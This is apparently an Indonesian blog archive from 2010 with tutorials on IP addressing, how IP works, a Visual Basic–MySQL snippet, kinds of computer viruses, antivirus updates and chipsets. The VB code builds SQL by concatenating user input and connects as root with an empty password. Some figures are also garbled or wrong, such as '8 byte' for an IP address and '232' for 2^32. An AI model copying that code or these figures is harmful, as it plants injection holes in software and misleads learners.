Pages

Monday, November 29, 2010

Konsep Dasar IP Address


Walaupun bagi para pengguna Internet umumnya kita hanya perlu mengenal hostname dari mesin yang dituju, seperti: server.indo.net.id, rad.net.id, ui.ac.id, itb.ac.id. Bagi komputer untuk bekerja langsung menggunakan informasi tersebut akan relatif lebih sulit karena tidak ada keteraturan yang dapat di programkan dengan mudah. Untuk mengatasi hal tersebut, komputer mengidentifikasi alamat setiap komputer menggunakan sekumpulan angka sebanyak 32 bit yang dikenal sebagai IP address.
Adanya IP Address merupakan konsekuensi dari penerapan Internet Protocol untuk mengintegrasikan jaringan komputer Internet di dunia. Seluruh host (komputer) yang terhubung ke Internet dan ingin berkomunikasi memakai TCP/IP harus memiliki IP Address sebagai alat pengenal host pada network. Secara logika, Internet merupakan suatu network besar yang terdiri dari berbagai sub network yang terintegrasi. Oleh karena itu, suatu IP Address harus bersifat unik untuk seluruh dunia. Tidak boleh ada satu IP Address yang sama dipakai oleh dua host yang berbeda. Untuk itu, penggunaan IP Address di seluruh dunia dikoordinasi oleh lembaga sentral Internet yang di kenal dengan IANA – salah satunya adalah Network Information Center (NIC) yang menjadi koordinator utama di dunia untuk urusan alokasi IP Address ini adalah :
InterNIC Registration Services Network Solution Incorporated 505 Huntmar Park Drive, Herndon, Virginia 22070 Tel: [800] 444-4345, [703] 742-4777 FAX: [703] 742-4811 E-mail: hostmaster@internic.net
Sedangkan untuk tingkat Asia Pasifik saat ini masih dikoordinasi oleh:
Asia Pacific Network Information Center c/o Internet Initiative Japan, Inc. Sanbancho Annex Bldg., 1-4, Sanban-cho, Chiyoda-ku, Tokyo, 102 Japan Tel: +81-3-5276-3973 FAX: +81-3-5276-6239 E-mail: domreg@apnic.net http://www.apnic.net
Struktur IP Address
IP Address terdiri dari bilangan biner sepanjang 32 bit yang dibagi atas 4 segmen. Tiap segmen terdiri atas 8 bit yang berarti memiliki nilai desimal dari 0 – 255. Range address yang bisa digunakan adalah dari 00000000.00000000.00000000.00000000 sampai dengan 11111111.11111111.11111111.11111111. Jadi, ada sebanyak 232 kombinasi address yang bisa dipakai diseluruh dunia (walaupun pada kenyataannya ada sejumlah IP Address yang digunakan untuk keperluan khusus). Jadi, jaringan TCP/IP dengan 32 bit address ini mampu menampung sebanyak 232 atau lebih dari 4 milyar host. Untuk memudahkan pembacaan dan penulisan, IP Address biasanya direpresentasikan dalam bilangan desimal. Jadi, range address di atas dapat diubah menjadi address 0.0.0.0 sampai address 255.255.255.255. Nilai desimal dari IP Address inilah yang dikenal dalam pemakaian sehari-hari. Beberapa contoh IP Address adalah :
44.132.1.20
167.205.9.35
202.152.1.250
Ilustrasi IP Addres dalam desimal dan biner dapat dilihat pada gambar 1 berikut :
ip1.gif
Gambar 1. IP Address dalam Bilangan Desimal dan Biner
IP Address dapat dipisahkan menjadi 2 bagian, yakni bagian network (bit-bit network/network bit) dan bagian host (bit-bit host/host bit). Bit network berperan dalam identifikasi suatu network dari network yang lain, sedangkan bit host berperan dalam identifikasi host dalam suatu network. Jadi, seluruh host yang tersambung dalam jaringan yang sama memiliki bit network yang sama. Sebagian dari bit-bit bagian awal dari IP Address merupakan network bit/network number, sedangkan sisanya untuk host. Garis pemisah antara bagian network dan host tidak tetap, bergantung kepada kelas network.

Ada 3 kelas address yang utama dalam TCP/IP, yakni kelas A, kelas B dan kelas C. Perangkat lunak Internet Protocol menentukan pembagian jenis kelas ini dengan menguji beberapa bit pertama dari IP Address. Penentuan kelas ini dilakukan dengan cara berikut : ·
  • Jika bit pertama dari IP Address adalah 0, address merupakan network kelas A. Bit ini dan 7 bit berikutnya (8 bit pertama) merupakan bit network sedangkan 24 bit terakhir merupakan bit host. Dengan demikian hanya ada 128 network kelas A, yakni dari nomor 0.xxx.xxx.xxx sampai 127.xxx.xxx.xxx, tetapi setiap network dapat menampung lebih dari 16 juta (2563) host (xxx adalah variabel, nilainya dari 0 s/d 255). Ilustrasinya dapat dilihat pada gambar 2 berikut.
ip2.gif
Gambar 2. Struktur IP Address Kelas A
  • Jika 2 bit pertama dari IP Address adalah 10, address merupakan network kelas B. Dua bit ini dan 14 bit berikutnya (16 bit pertama) merupakan bit network sedangkan 16 bit terakhir merupakan bit host. Dengan demikian terdapat lebih dari 16 ribu network kelas B (64 x 256), yakni dari network 128.0.xxx.xxx – 191.255.xxx.xxx. Setiap network kelas B mampu menampung lebih dari 65 ribu host (2562). Ilustrasinya dapat dilihat pada gambar 3 berikut.
ip3.gif
Gambar 3. Struktur IP Address Kelas B
  • Jika 3 bit pertama dari IP Address adalah 110, address merupakan network kelas C. Tiga bit ini dan 21 bit berikutnya (24 bit pertama) merupakan bit network sedangkan 8 bit terakhir merupakan bit host. Dengan demikian terdapat lebih dari 2 juta network kelas C (32 x 256 x 256), yakni dari nomor 192.0.0.xxx sampai 223.255.255.xxx. Setiap network kelas C hanya mampu menampung sekitar 256 host. Ilustrasinya dapat dilihat pada gambar 4.
ip4.gif
Gambar 4. Struktur IP Address Kelas C
Selain ke tiga kelas di atas, ada 2 kelas lagi yang ditujukan untuk pemakaian khusus, yakni kelas D dan kelas E. Jika 4 bit pertama adalah 1110, IP Address merupakan kelas D yang digunakan untuk multicast address, yakni sejumlah komputer yang memakai bersama suatu aplikasi (bedakan dengan pengertian network address yang mengacu kepada sejumlah komputer yang memakai bersama suatu network). Salah satu penggunaan multicast address yang sedang berkembang saat ini di Internet adalah untuk aplikasi real-time video conference yang melibatkan lebih dari dua host (multipoint), menggunakan Multicast Backbone (MBone). Kelas terakhir adalah kelas E (4 bit pertama adalah 1111 atau sisa dari seluruh kelas). Pemakaiannya dicadangkan untuk kegiatan eksperimental.
Jenis kelas address yang diberikan oleh kooordinator IP Address bergantung kepada kebutuhan instansi yang meminta, yakni jumlah host yang akan diintegrasikan dalam network dan rencana pengembangan untuk beberapa tahun mendatang. Untuk perusahaan, kantor pemerintah atau universitas besar yang memiliki puluhan ribu komputer dan sangat berpotensi untuk tumbuh menjadi jutaan komputer, koordinator IP Address akan mempertimbangkan untuk memberikan kelas A. Contoh IP Address kelas A yang dipakai di Internet adalah untuk amatir paket radio seluruh dunia, mendapat IP nomor 44.xxx.xxx.xxx. Untuk kelas B, contohnya adalah nomor 167.205.xxx.xxx yang dialokasikan untuk ITB dan jaringan yang terkait ke ITB dibawah koordinator Onno W. Purbo.
Address Khusus
Selain address yang dipergunakan untuk pengenal host, ada beberapa jenis address yang digunakan untuk keperluan khusus dan tidak boleh digunakan untuk pengenal host. Address tersebut adalah :
  • Network Address
    Address ini digunakan untuk mengenali suatu network pada jaringan Internet. Misalkan untuk host dengan IP Address kelas B 167.205.9.35. Tanpa memakai subnet, network address dari host ini adalah 167.205.0.0. Address ini didapat dengan membuat seluruh bit host pada 2 segmen terakhir menjadi 0. Tujuannya adalah untuk menyederhanakan informasi routing pada Internet. Router cukup melihat network address (167.205) untuk menentukan kemana paket tersebut harus dikirimkan. Contoh untuk kelas C, network address untuk IP address 202.152.1.250 adalah 202.152.1.0. Analogi yang baik untuk menjelaskan fungsi network address ini adalah dalam pengolahan surat pada kantor pos. Petugas penyortir surat pada kantor pos cukup melihat kota tujuan pada alamat surat (tidak perlu membaca seluruh alamat) untuk menentukan jalur mana yang harus ditempuh surat tersebut. Pekerjaan “routing” surat-surat menjadi lebih cepat. Demikian juga halnya dengan router di Internet pada saat melakukan routing atas paket-paket data.
  • Broadcast Address
    Address ini digunakan untuk mengirim/menerima informasi yang harus diketahui oleh seluruh host yang ada pada suatu network. Seperti diketahui, setiap paket IP memiliki header alamat tujuan berupa IP Address dari host yang akan dituju oleh paket tersebut. Dengan adanya alamat ini, maka hanya host tujuan saja yang memproses paket tersebut, sedangkan host lain akan mengabaikannya. Bagaimana jika suatu host ingin mengirim paket kepada seluruh host yang ada pada networknya ? Tidak efisien jika ia harus membuat replikasi paket sebanyak jumlah host tujuan. Pemakaian bandwidth akan meningkat dan beban kerja host pengirim bertambah, padahal isi paket-paket tersebut sama. Oleh karena itu, dibuat konsep broadcast address. Host cukup mengirim ke alamat broadcast, maka seluruh host yang ada pada network akan menerima paket tersebut. Konsekuensinya, seluruh host pada network yang sama harus memiliki address broadcast yang sama dan address tersebut tidak boleh digunakan sebagai IP Address untuk host tertentu. Jadi, sebenarnya setiap host memiliki 2 address untuk menerima paket : pertama adalah IP Addressnya yang bersifat unik dan kedua adalah broadcast address pada network tempat host tersebut berada. Address broadcast diperoleh dengan membuat seluruh bit host pada IP Address menjadi 1. Jadi, untuk host dengan IP address 167.205.9.35 atau 167.205.240.2, broadcast addressnya adalah 167.205.255.255 (2 segmen terakhir dari IP Address tersebut dibuat berharga 11111111.11111111, sehingga secara desimal terbaca 255.255). Jenis informasi yang dibroadcast biasanya adalah informasi routing.
  • Netmask
    Adalah address yang digunakan untuk melakukan masking / filter pada proses pembentukan routing supaya kita cukup memperhatikan beberapa bit saja dari total 32 bit IP Address. Artinya dengan menggunakan netmask tidak perlu kita memperhatikan seluruh (32 bit) IP address untuk menentukan routing, akan tetapi cukup beberapa buah saja dari IP address yg kita perlu perhatikan untuk menentukan kemana packet tersebut dikirim.  
Kaitan antara host address, network address, broadcast address & network mask sangat erat sekali – semua dapat dihitung dengan mudah jika kita cukup paham mengenai bilangan Biner. Jika kita ingin secara serius mengoperasikan sebuah jaringan komputer menggunakan teknologi TCP/IP & Internet, adalah mutlak bagi kita untuk menguasai konsep IP address tersebut. Konsep IP address sangat penting artinya bagi routing jaringan Internet. Kemampuan untuk membagi jaringan dalam subnet IP address penting artinya untuk memperoleh routing yang sangat effisien & tidak membebani router-router yang ada di Internet. Mudah-mudahan tulisan awal ini dapat membuka sedikit tentang teknologi / konsep yang ada di dalam Internet.





prinsip kerja ip

Prinsip kerja InterNet Protokol (IP).

Fungsi dari InterNet Protokol secara sederhana dapat diterangkan seperti cara kerja kantor pos pada proses pengiriman surat. Surat kita masukan ke kotak pos akan diambil oleh petugas pos dan kemudian akan dikirim melalui route yang random, tanpa si pengirim maupun si penerima surat mengetahui jalur perjalanan surat tersebut. Juga jika kita mengirimkan dua surat yang ditujukan pada alamat yang sama pada hari yang sama, belum tentu akan sampai bersamaan karena mungkin surat yang satu akan mengambil route yang berbeda dengan surat yang lain. Di samping itu, tidak ada jaminan bahwa surat akan sampai ditangan tujuan, kecuali jika kita mengirimkannya menggunakan surat tercatat.



Prinsip di atas digunakan oleh InterNet Protokol, "surat" diatas dikenal dengan sebutan datagram. InterNet protokol (IP) berfungsi menyampaikan datagram dari satu komputer ke komputer lain tanpa tergantung pada media kompunikasi yang digunakan. Data transport layer dipotong menjadi datagram-datagram yang dapat dibawa oleh IP. Tiap datagram dilepas dalam jaringan komputer dan akan mencari sendiri secara otomatis rute yang harus ditempuh ke komputer tujuan. Hal ini dikenal sebagai transmisi connectionless. Dengan kata lain, komputer pengirim datagram sama sekali tidak mengetahui apakah datagram akan sampai atau tidak.
Untuk membantu mencapai komputer tujuan, setiap komputer dalam jaringan TCP/IP harus diberikan IP address. IP address harus unik untuk setiap komputer, tetapi tidak menjadi halangan bila sebuah komputer mempunyai beberapa IP address. IP address terdiri atas 8 byte data yang mempunyai nilai dari 0-255 yang sering ditulis dalam bentuk [xx.xx.xx.xx] (xx mempunyai nilai dari 0-255).

Pada header InterNet Protokol selain IP address dari komputer tujuan dan komputer pengirim datagram juga terdapat beberapa informasi lainnya. Informasi ini mencakup jenis dari protokol transport layer yang ditumpangkan diatas IP. Tampak pada gambar 2 ada dua jenis protokol pada transport layer yaitu TCP dan UDP. Informasi penting lainnya adalah Time-To-Live (TTL) yang menentukan berapa lama IP dapat hidup didalam jaringan. Nilai TTL akan dikurangi satu jika IP melalui sebuah komputer. Hal ini penting artinya terutama karena IP dilepas di jaringan komputer. Jika karena satu dan lain hal IP tidak berhasil menemukan alamat tujuan maka dengan adanya TTL IP akan mati dengan sendirinya pada saat TTL bernilai nol. Disamping itu juga tiap IP yang dikirimkan diberikan identifikasi sehingga bersama-sama dengan IP address komputer pengirim data dan komputer tujuan, tiap IP dalam jaringan adalah unik.

Khususnya untuk pemakai jaringan komputer hal yang terpenting untuk dipahami secara benar-benar adalah konsep IP address. Lembaga yang mengatur IP address adalah Network Information Center (NIC) di Department of Defence di US yang beralamat di hostmaster@nic.ddn.mil. Pengaturan IP address penting, terutama pada saat mengatur routing secara otomatis. Sebagai contoh jaringan komputer di amatir radio mempunyai IP address kelas yang mempunyai address [44.xx.xx.xx]. Khusus untuk amatir radio di Indonesia IP address yang digunakan adalah [44.132.xx.xx]. Sedangkan penulis di Canada mempunyai IP address [44.135.84.22]. Hal ini terlihat dengan jelas bahwa IP address di amatir radio sifatnya geografis. Dari IP address penulis dapat dibaca bahwa mesin penulis berada di network 44 di InterNet yang dikenal sabagai AMPRNet (ampr.org). 135 menandakan bahwa penulis berada di Canada. 84 memberitahukan bahwa penulis berada di kota Waterloo di propinsi Ontario, sedang 22 adalah nomor mesin penulis. Dengan konsep IP address, route perjalanan IP dalam jaringan komputer dapat dilakukan secara otomatis. Sebagai contoh, jika sebuah komputer di InterNet akan mengirimkan IP ke [44.135.84.22], pertama-tama IP yang dilepas di network akan berusaha mencari jalan ke network 44.135.84, setelah mesin yang mengubungkan network 44.135.84 tercapai IP tersebut akan mencoba menghubungi mesin 22 di network tersebut. Kesemuanya ini dilakukan secara otomatis oleh program.

Tentunya sukar bagi manusia untuk mengingat sedemikian banyak IP address. Untuk memudahkan, dikembangkan Domain Name System (DNS). Sebagai contoh mesin penulis di AMPRNet dengan IP address [44.135.84.22], penulis beri nama (hostname) ve3.yc1dav.ampr.org. Terlihat bahwa hostname yang digunakan penulis sangat spesifik dan sangat memudahkan untuk mengetahui bahwa penulis berada di AMPRNet dari kata ampr.org. Mesin tersebut berada di Kanada dan propinsi Ontario dari ve3 sedang yc1dav adalah penulis sendiri. Contoh lain dari DNS adalah sun1.vlsi.waterloo.edu yang merupakan sebuah Sun SPARC workstation (sun1) di kelompok peneliti VLSI di University of Waterloo, Kanada (waterloo.edu) tempat penulis bekerja dan belajar. Perlu dicatat bahwa saat ini NIC belum memberikan domain untuk Indonesia. Mudah-mudahan dengan berkembangnya jaringan komputer TCP/IP di Indonesia ada saatnya dimana kita di Indonesia perlu meminta domain tersendiri untuk Indonesia.


Saturday, November 27, 2010

Visual Basic – MySQL – VSFlexGrid – Crystal Report


VB MySQL
Public objCnn As New ADODB.Connection
Public objcmd As New ADODB.Command
Public objRst As New ADODB.Recordset
Public USRText As String
Public PWDText As String
Public PortText As String
Public strconnect As String
Public ServerAddress As String
Public DatabaseName As String
Sub SQLConnection()
    ServerAddress = “localhost”
    USRText = “root”
    PWDText = “”
    DatabaseName = “market”
    PortText = “”
    Set objCnn = Nothing
    strconnect = “Provider=MSDASQL.1;Password=;Persist Security Info=True;User ID=;Extended Properties=” & Chr$(34) & “DRIVER={MySQL ODBC 3.51 Driver};DESC=;DATABASE=” & DatabaseName & “;SERVER=” & ServerAddress & “;UID=” & USRText & “;PASSWORD=” & PWDText & “;PORT=” & PortText & “;OPTION=16387;STMT=;” & Chr$(34)
    objCnn.CursorLocation = adUseClient
    objCnn.ConnectionTimeout = 0
    objCnn.Open strconnect
End Sub
 Select Case MsgBox(“Do you want to save the record?”, vbQuestion + vbYesNoCancel, “Confirmation”)
                Case vbYes
                   ‘ If Not bValidate Then Exit Sub
                 
                    Call SQLConnection
                    strSQL = “INSERT INTO marketdetail (ID, Comodity, Quantity, Negara, Dest, Tanggal, CW, Berat) ” & _
                        “VALUES (‘” + Trim(Me.TxtName.Item(0).Text) + “‘ , ‘” + Trim(Me.TxtName.Item(1).Text) + “‘, ” & Me.TxtName.Item(2).Text & “,” & _
                                ” ‘” + Trim(Me.TxtName.Item(3).Text) + “‘ , ‘” + Trim(Me.TxtName.Item(4).Text) + “‘, ‘” + Format(Me.TxtDate(0).Value, “mm/dd/yy”) + “‘, ‘” & Me.TxtName.Item(5).Text & “‘, ‘” & Me.TxtName.Item(6).Text & “‘)”
                    objCnn.Execute (strSQL)
                    Call SQLDisconnection
             Case vbNo
                   msgbox “Gak Jadi !!”
            Case vbCancel
                   Msgbox “Batal”
            End Select

Cara Kerja Virus komputer

Virus merupakan suatu program komputer yang memiliki kemampuan untuk merusak file atau merusak sistem komputer.Virus memiliki berbagai jenis dan mempunyai cara kerja yang berbeda-beda, Berikut Jenis-jenis virus dan cara kerja masing-masing virus :

1. Virus File
Virus ini mempunyai cara kerja yaitu menginfeksi aplikasi atau dokumen yang ada dalam komputer anda. Saat aplikasi yang terinfeksi tersebut dijalankan, maka virus ini akan menyebar dengan cara menginfeksi semua file atau dokumen yang diakses oleh aplikasi tersebut.

2. Virus Boot Sector
Virus ini mempunyai cara kerja yaitu menginfeksi boot sector harddisk (boot sector merupakan sebuah daerah dalam hardisk yang pertama kali diakses saat komputer dihidupkan). Jika virus boot sector ini aktif, pengguna tidak akan bisa membooting komputernya secara normal.

3. Virus E-mail
Virus ini mempunyai cara kerja yaitu menyebar melalui e-mail (biasanya dalam bentuk file lampiran/attachment). Virus memiliki ciri khusus berupa ekstensi .scr, .exe, .pif, atau .bat.
Apabila Virus ini aktif, maka dia akan mengirimkan dirinya sendiri ke berbagai alamat e-mail yang terdapat dalam buku alamat pengguna.

4. Virus Multipartite
Virus ini mempunyai cara kerja yaitu menginfeksi file-file komputer sekaligus boot sector pada harddisk. Virus jenis ini akan menimbulkan banyak masalah karena menyebabkan kerusakan yang fatal.

5. Virus Polimorfis
Virus ini mempunyai cara kerja yang unik yaitu virus ini dapat mengubah kode dirinya (berganti wujud) saat menyebarkan diri ke komputer lain Virus jenis lebih sulit dideteksi karena mempunyai sifat seperti itu..

6. Virus Siluman (stealth virus)
Virus ini mempunyai cara kerja yaitu dia mampu Menyembunyikan dirinya dengan cara membuat sebuah file yang terinfeksi seolah-olah file tersebut tidak terinfeksi.

7. Virus Makro
Virus ini mempunyai cara kerja yaitu menginfeksi Aplikasi Microsoft Office, seperti Word dan Excel. Biasanya Dokumen yang terinfeksi oleh Virus Makro akan memodifikasi perintah yang ada di Microsoft Office seperti perintah “Save” untuk menyebarkan dirinya saat perintah tersebut dijalankan.
 
sumber: http://finderonly.com/2008/11/13/cara-kerja-virus-komputer-menurut-jenisnya/

Beberapa cara kerja anti virus


AVIRA
Avira antivir yg gratisan, lumayanlah dibanding antivirus gratis lainnya. Update berkala sangat disarankan mengingat masih banyak orang-orang sinting yg dengan sengaja atau tidak membuat perkembangan mallware kian meningkat. Hampir setiap hari sebuah virus baru dibuat!
Antivir kadang menyediakan update data virus di databasenya 3 kali sehari. Wow.. Bagi anda yg memiliki bandwidth lebar, mungkin tidak masalah, tapi bagi teman2 lain yg hanya mengandalkan wireless, nebeng di hotspot atau mentok-mentoknya telkom speedy personal, waduh, dijamin tidak akan pernah lancar mengupdate itu anti virus.
Cara yg mudah adalah mendownload file update-an bernama: ivdf_fusebundle_nt_en yg disediakan oleh avira di sini: http://dl.antivir.de/down/vdf/ivdf_fusebundle_nt_en.zip
Biar cepat, gunakan download manager. Kalo dah terdownload semua, aktifkan jendela avira antivir dengan mengklik ganda icon tray-nya di pojok kanan bawah monitor. Klik menu Update dan pilih Manual Update, cari lokasi file yg sudah anda download.


AVAST
Untuk avast antivirus cara updatenya relatif mudah kita dapat melakukan update secara online maupun offline.
Untuk yang online, setelah Avast! terinstall di komputer, biasanya ia memiliki pengaturan default yang telah mengatur supaya setiap kali komputer Anda terkoneksi ke internet, ia akan memperbaharui database pengenal virusnya secara otomatis.
Namun jika tidak, Anda bisa mengaturnya dengan mudah. Caranya, pertama tentu saja buka program Avast!-nya (biasanya terletak di START » All Programs » avast! Antivirus). Sesaat Avast! akan melakukan penjelajahan pada sistem memori untuk mengecek kalau-kalau ada virus yang bersembunyi di sistem memori komputer.
Setelah Avast! terbuka, masuk ke menu Settings… » Update (Basic). Disini Anda bisa memilih pilihan “Automatic” atau “Ask when update is available”.
Untuk update secara offlinenya kita dapat mendownload databasenya yang bernama “vpsupd.exe” yang kemudian bisa diinstal ke komputer yang sudah terlebih dahulu diinstal antivirus AVAST ini



AVG
Setelah proses instalasi antivirus avg, anda akan ditanyakan meng-update melalui internet (online) atau folder (offline/manual). File virus definisi (update) dapat di-download dari situs web AVG
Langkah-langkah cara atau tips update manual/offline:
1. Download file update avg yang tersedia di Internet caranya klik tombol “internet” untuk menampilkan kotak dialog update kemudian klik update/download file.
2. Klik tombol update untuk menampilkan kotak dialog yang memungkinkan Anda memilih folder. Gunakan kotak dialog ini untuk memilih folder yang menyimpan file update AVG anda. Jika sudah anda klik OK, AVG akan mencari folder yang dipilih untuk memperbarui file dan memperbarui sendiri jika perlu.
Centang kotak “Don’t ask” untuk tidak mengingatkan anda update lain kali, jika Anda ingin AVG untuk mengingat anda untuk update maka jangan centang “don’t ask”. (Untuk mengaktifkan dialog ini lagi: Update Manager komponen -> Properties -> tidak memberi tanda centang pada “Don’t ask” for the update)

FUNGSI INTERNET


Internet berfungsi sebagai aspek kmunikasi,penyedia informasi,dan fasilitas untuk promosi.Internet dapat menghubungkan kita dengan berbagai pihak di berbagai lokasi di seluruh dunia.Misalnya kita bisa kirim data atau surat dengan berbagai pihak diseluruh dunia dengan menggunakan fasilitas Electronic mail (E-mail).Selain fasilitas Electronic mail internet juga menyediakan fasilitas untuk ngobrol yang dalam internet disebut chatting.Kemampuan internet lainnya adalah Usenet ,yaitu forum yang disediakan bagi pengguna internet untuk berbagi informasi dan pemikiran mengenai suatu topk melalui bulettin elektronik.Dengan menggunakan forum ini,pengguna dapat mengirim pesan mngenai topik bersangkutan dan menerima tanggapan dari pihak lain.
Internet terhubung dengan ratusan katalog perpustakaan,sehingga penggunaannya dapat meneliti ribuan data base yang terbuka untuk umum melalui jaringan tersebut yang disediakan oleh perusahaan,pemerintah ataupun niralaba.Pengguna internet dapat mempergunakan informasi ini untuk berbagai keperluan bisnisnya,sehingga bisa mengetahui kondisi lingkungan termasuk pesaing dan perkembangan kepentingan para stakeholder.Beberapa metode atau alat untuk mengakses komputer dan mencari file yang dapat diterapkan melalui internet adalah gopher,archie,dan wide area information servers.
Dalam dunia bisnis internet digunakan sebagai alat penghubung yang praktis untuk komunikasi antara perusahaan dengan pelanggan,tanpa harus memikirkan waktu dan lokasi.Sekarang ini banyak situs – situs yang melakukan penjualan barang dan jasa lewat internet,dan tentunya kita kalau ingin membeli harus memakai kartu kredit,jadi transaksi itu terjadi lewat internet.Kebanyakan orang di luar negeri seperti Amerika sering berbelanja produk atau barang lewat internet.Kalau dinegara kita masih jarang yang melakukan pembelian lewat internet yang ada penjualan,penyedia jasa dan penyedia informasi,apakah itu informasih tentang berita,informasi tentang pendidikan,atau lain- lainnya. selain hal-hal yang di atas fungsi internet dan jaringannya ada banyak banget cuyy ... jadi gak bisa di sebutin satu persatu. Trims ^_^

Pengertian chipset


Secara fisik, chipset berupa sekumpulan IC kecil atau chips yang dirancang untuk bekerjasama dan memiliki fungsi-fungsi tertentu. Pada sistem hardware komputer, chipset ini bisa terdapat pada motherboard, card-card (kartu-kartu) ekspansi, misalnya pada kartu grafis (video card), atau pada peralatan komputer lainnya. Fungsi chipset pada motherboard tidak sama dengan chipset pada kartu-kartu ekspansi. Begitu pula fungsi chipset pada peralatan komputer lainnya. Masing-masing memiliki fungsi sendiri yang bersifat spesifik. Chipset sebenarnya tidak selalu terdiri dari sekumpulan IC atau sekumpulan chip, kadang-kadang dijumpai hanya terdiri dari sebuah chip saja.
Chipset pada video card berfungsi untuk mengontrol rendering grafik 3 dimensi dan output berupa gambar pada monitor. Sedangkan chipset pada motherboard berfungsi untuk mengontrol input dan output (masukan dan keluaran) yang mendasar pada komputer. Perlu diketahui, bahwa yang dibahas pada bab ini difokuskan pada chipset yang ada pada motherboard, bukan chipset yang ada pada komponen atau perangkat komputer lainnya.


Lebih jelasnya, dapat dikatakan bahwa chipset yang biasa terdapat pada motherboard berfungsi untuk mengatur aliran data dari satu komponen ke komponen lainnya. Misalnya mengarahkan data dari CPU (prosesor) menuju kartu grafis (video card) atau ke sistem memori (RAM), serta mengarahkan aliran data melalui bus PCI, drive IDE dan port I/O. Pada kasus ini, dapat diibaratkan bahwa chipset seakan-akan berfungsi sebagai ‘polisi lalu lintas’ pengatur aliran data pada motherboard di sebuah PC (Personal Computer).
Selain mengatur aliran data, chipset juga ikut menentukan piranti apa saja yang dapat didukung oleh PC tersebut, serta turut menentukan kecepatan FSB (Front Side Bus), bus memori, bus grafis, kapasitas serta tipe memori yang dapat didukung oleh motherboard yang bersangkutan, dan menentukan standart IDE, juga tipe port yang didukung oleh sistem.
Sebenarnya, lebih detail lagi dapat dijelaskan bahwa chipset tradisional pada motherboard terdiri dari dua bagian, yaitu northbridge dan southbridge. Tugas-tugas umum chipset seperti yang telah dijelaskan tadi, dibagi kepada kedua bagian chipset tersebut. Masing-masing bagian chipset (northbridge atau southbridge) mempunyai tugas sendiri-sendiri yang bersifat spesifik dan bekerja sesuai fungsinya.
Asal mula istilah northbridge dan southbridge
Pemunculan istilah northbridge dan southbridge berawal dari kebiasaan dalam menggambar suatu bagan atau peta tentang arsitektur suatu komponen. CPU biasanya diletakkan pada bagian atas (puncak) bagan. Pada suatu peta, bagian atas selalu identik dengan arah utara. CPU kemudian dihubungkan dengan chipset melalui fast bridge atau jalur penghubung cepat yang menyambung langsung di bagian atas unit chipset. Itulah sebabnya bagian yang langsung berhubungan dengan CPU tersebut disebut northbridge. Northbridge ini kemudian dihubungkan dengan bagian bawah unit chipset melalui slow bridge atau jalur penghubung yang lebih lambat. Unit chipset bagian bawah ini kemudian disebut southbridge. Jika bagian atas menyimbolkan arah utara, dengan sendirinya bagian bawah menyimbolkan arah selatan. Itulah sebabnya disebut dengan istilah southbridge.
1.Northbridge
Northbridge disebut juga dengan nama memory controller hub (MCH). Perusahaan pembuat chipset yang menggunakan nama sebutan MCH ini adalah Intel. Sedangkan AMD, VIA dan perusahaan lainnya lebih banyak menggunakan nama sebutan northbridge.
Northbridge memiliki peran khusus yang sangat penting dalam suatu sistem motherboard. Northbridge adalah bagian yang menghubungkan prosesor (CPU) ke sistem memori dan graphics controller (AGP dan PCI Express) melalui bus berkecepatan tinggi, dan ke southbridge. Dengan demikian, Northbridge bertugas mengendalikan/ menangani komunikasi antara CPU, RAM, AGP atau PCI Express, dan southbridge. Bahkan pada sebagian chipset, di dalam northbridge juga berisi integrated video controller (pengendali video terintegrasi). Pada sistem Intel istilah integrated video controller ini disebut dengan nama Graphics and Memory Controller Hub (GMCH).
Northbridge juga berperan menentukan jumlah, type dan kecepatan CPU yang dapat dipasangkan pada motherboard, termasuk menentukan jumlah, kecepatan dan type RAM yang dapat digunakan. Setiap jenis chipset, kebanyakan dirancang hanya untuk mendukung seri prosesor tertentu saja, dengan jumlah RAM yang dapat dipasangkan bervariasi bergantung type prosesor dan desain motherboardnya sendiri.
Pada motherboard untuk prosesor Pentium (sebelum Pentium II), kapasitas RAM yang dapat dipasangkan seringkali dibatasi sampai 128 MB saja. Sedangkan motherboard untuk Pentium 4, kapasitas RAM yang dapat dipasangkan dibatasi 4 GB. Perlu diketahui bahwa sejak era Pentium Pro muncul, arsitektur Intel yang diterapkan prosesor tersebut dapat mengakomodasi address fisik lebih besar dari 32 bit, biasanya 36 bit, sehingga mampu mendukung RAM hingga 64 GB. Namun, jarang ada motherboard yang didesain mampu mendukung RAM hingga 64 GB, lagi pula banyak faktor pembatas lain yang tidak memungkinkan diterapkannya fitur RAM tersebut, misalnya keterbatasan dukungan dari OS dan mahalnya harga RAM).
Sampai saat ini, tidak begitu banyak chipset yang mampu mendukung dua tipe RAM sekaligus. Biasanya chipset semacam ini baru diproduksi bila muncul standart baru yang ditetapkan oleh pabrik karena munculnya perkembangan teknologi baru. Contoh northbridge yang hanya mendukung satu type RAM adalah northbridge dari chipset NVIDIA nForce. Chipset ini hanya dapat dipasangkan dengan prosesor AMD yang didesain menggunakan soket A yang dikombinasi dengan pemakaian DDR SDRAM. Contoh lainnya adalah chipset Intel i875. Chipset ini hanya dapat bekerja dengan prosesor Pentium 4 atau Celeron yang memiliki clock speed lebih tinggi dari 1,3 GHz yang dikombinasi dengan pemakaian DDR SDRAM. Sedangkan contoh chipset yang dapat mendukung dua tipe RAM adalah chipset Intel i915. Chipset tersebut dapat bekerja dengan prosesor Intel Pentium 4 dan Celeron yang menggunakan menggunakan DDR maupun DDR2.
Pada perkembangan selanjutnya, memory controller yang menangani komunikasi antara CPU dan RAM tidak lagi berada pada chipset, memory controller tersebut dipindahkan ke prosesor, terintegrasi dengan die prosesor. Contoh prosesor yang telah dilengkapi dengan memory controller ini adalah prosesor AMD64. Akibatnya, chipset untuk prosesor AMD64 (misalnya chipset NVIDIA nForce3) menjadi single chip (chip tunggal) yang merupakan gabungan dari semua fitur southbridge dengan port AGP. Chipset ini dihubungkan langsung ke CPU (prosesor). Sedangkan Intel juga akan melakukan hal yang sama, yaitu mengintegrasikan memory controller tersebut ke dalam prosesor produksinya. Rencananya kelak akan diterapkan pada prosesor yang berbasis mikroarsitektur Nehalem.
2.Southbridge
Southbridge adalah bagian dari chipset yang mengontrol bus IDE, USB, dukungan Plug and Play, menjembatani PCI dan Isa, mengontrol keyboard dan mouse, fitur power management dan sejumlah perangkat lainnya.
Southbridge berhubungan dengan pheriperal, memalui jalur penghubung yang kecepatannya (kecepatan bus) lebih lambat (misalnya bus PCI dan bus ISA) dibandingkan jalur penghubung yang digunakan oleh northbridge. Pada beberapa chipset modern, southbridge sebenarnya mengandung (memuat) pheripheral yang terintegrasi pada chip, seperti ethernet, USB, dan audio.

Friday, November 26, 2010

CARA KERJA KEYBOARD



